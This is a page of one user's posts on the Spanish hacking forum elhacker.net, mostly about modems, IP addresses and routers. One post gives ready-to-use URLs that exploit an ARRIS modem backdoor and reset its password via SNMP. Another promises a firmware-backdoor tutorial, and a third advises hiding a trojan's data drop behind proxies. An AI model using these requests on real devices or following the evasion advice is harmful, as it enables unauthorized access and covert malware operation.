elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ... 63
111  Seguridad Informática / Seguridad / Re: Ayuda algo paso con el cmd en una descarga en: 27 Mayo 2015, 10:01 am
Me das muy mala espina amigo.
Creo que ya se quien eres.
Creo que en lo general se debería abrir en Segundo Plano de ser así.

Saludos.
112  Seguridad Informática / Hacking Wireless / Re: DuDA sobre fabricante Router ARRIS en: 27 Mayo 2015, 09:42 am
Scott, y para que es eso?osea por curiosidad, me gustaría saber que es lo que hace la técnica que has descrito

Es un backdoor que tiene por defeco el modem.

Muy pronto voy a subir un tutorial que estuve elaborando hace 1 año.
De como poner una puerta trasera a un modem.
Ósea en el mismo inicio de sesión pongas otro usuario.
Y hasta porque no, modificar el nombre del modem por defecto.
Desde un Firmware.

Nunca falto en los BackDoors Engel lex  ;D
Saludos.
113  Seguridad Informática / Hacking Wireless / Re: DuDA sobre fabricante Router ARRIS en: 27 Mayo 2015, 08:46 am
Pues yo le he encontrado una vulnerabilidad.

Escribe en tu url la ip de tu modem:
192.168.100:8080/login?dGVjaG5pY2lhbjo=
El puerto 80 nunca nos decepciona  ;D

Y por ultimo 192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;

Comenta me, lo que sucedió, quiero saber si mi trabajo funciona.
Saludos.
114  Comunicaciones / Redes / Re: ¿Como reiniciar un módem remotamente cuando no hay internet? en: 27 Mayo 2015, 07:33 am
No hagas Offtopic.

¿Una cosa que no entiendo es que a ti se te va la luz y no a tu vecino?
De ser un apagón general en toda la ciudad, el router tiene una batería para seguir cargando, pero el modem no funcionaria porque necesita el cargador de línea directa.
Lo cual no puedes reiniciarlo.

Lo que me deja que después de que vuelve la luz, ¿el servidor DNS se congela? tal vez, y no queda mas que reiniciarlo.

Lo que te da internet es modem, que va conectado al router.
Pero puede que tu router tenga función de modem y ruter.
Y engel lex te dio ya la respuesta en una imagen.
Saludos.
115  Comunicaciones / Redes / Re: ¿Como reiniciar un módem remotamente cuando no hay internet? en: 27 Mayo 2015, 07:05 am
Hola, hay dos tipos de IP, la Dinamica y la Estatica.

Normalmente los ISP otorgan IP Dinamica que suele cambiar sola cada cierto tiempo, 2 ó 3 dias, o al reiniciar el ruter.

La IP Estatica permanece siempre la misma, no cambia, pero esta suele tener que solicitarse al proveedor porque se suele pagar aparte.



Saludos.

En cuanto a ello, acabo de ver en una pc de una amiga, se conecto en mi red. Y tiene la misma Ip que yo.
Eso es un problema.

Saludos.
116  Comunicaciones / Redes / Re: ¿Como reiniciar un módem remotamente cuando no hay internet? en: 27 Mayo 2015, 01:40 am
Si, pero Engel lex, CANTV es en tu país, probablemente el sea de otro país, Si le dieron un router. Le tuvieron que dar un Modem.

Aquí en mi país te dan un router y un modem.
El router es para la TV, y el modem va conectado con el router.

AvmHack , ¿tienes solo el router o tienes modem y router?

Saludos.
117  Comunicaciones / Redes / Re: ¿Como reiniciar un módem remotamente cuando no hay internet? en: 27 Mayo 2015, 01:10 am
_scott, no es el router, es el modem tras el router... eso me ha tocado mucho :s

¿Entonces que modem tiene?
Saludos.
118  Comunicaciones / Redes / Re: ¿Como reiniciar un módem remotamente cuando no hay internet? en: 27 Mayo 2015, 00:06 am
119  Seguridad Informática / Análisis y Diseño de Malware / Re: Distintas formas de obtener datos de troyanos de manera indetectable. en: 26 Mayo 2015, 23:10 pm
En que consiste? la idea sería tener un dominio en el troyano y que siempre se conectara a ese dominio, ahora de lo que se trata es de cambiarle la IP, o buscar una manera de no ser detectado, sería fácil poner una web gratuita y que suba allí los datos, pero no tardarían ni 2 días en banearla o interceptarla, de todas formas hace poco estuve buscado y parece que lo de los proxies es buena opción.

https://www.proxifier.com/documentation/v3/chain.htm

Pintaría bien usar un proxy de esos, usar una cuenta NOIP, hacer NAT con el router, de esa manera podría ser dificil, pero no indetectable, te podrían pillar facilmente preguntando al servidor de proxy.

Saludos :P
No hace falta usar No-Ip, esta muy quemado además, puedes clonar una ip de cualquier parte del mundo :P
No es tan difícil.


Saludos.

120  Foros Generales / Foro Libre / Re: ¿Cual es el salario mínimo en tu país? en: 26 Mayo 2015, 23:07 pm
Ignorantev1.1, si leíste que escribí,
Citar
Desgraciadamente los obligan o les quitan el trabajo
Conozco la situación del país, Lastimosamente, es la ignorancia que ocasiona todo esto. Es por eso, que yo prefiero juzgarme a mi mismo que a los demás.


Saludos.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ... 63
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines